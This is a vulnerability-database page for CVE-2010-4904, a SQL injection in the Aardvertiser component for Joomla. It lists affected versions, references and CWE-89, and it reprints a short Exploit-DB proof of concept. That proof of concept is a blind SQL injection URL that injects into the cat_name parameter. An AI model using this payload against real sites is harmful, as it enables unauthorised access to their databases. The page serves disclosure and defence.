CVE-2010-4904
Description
SQL injection vulnerability in the Aardvertiser (com_aardvertiser) component 2.1 and 2.1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the cat_name parameter in a view action to index.php. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component Aardvertiser 2.1 - Blind SQL Injection
# Exploit Title: Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability
# Date: 07.09.2010
# Author: Stephan Sattler // www.solidmedia.de
# Software Link: http://sourceforge.net/projects/aardvertiser/files/com_aardvertiser%20V2.1.1%20Free/com_aardvertiserfree.zip/download
# Version: 2.1 free
[ Vulnerability//PoC ]
http://server/joomlapath/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| simon_philips | com_aardvertiser | 2.1 | |
| simon_philips | com_aardvertiser | 2.1.1 | |
| joomla | joomla\! | | |
References
- http://secunia.com/advisories/41293
- http://www.exploit-db.com/exploits/14922
- http://www.securityfocus.com/bid/43014
- http://www.vupen.com/english/advisories/2010/2310
- http://secunia.com/advisories/41293
- http://www.exploit-db.com/exploits/14922
- http://www.securityfocus.com/bid/43014
- http://www.vupen.com/english/advisories/2010/2310
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.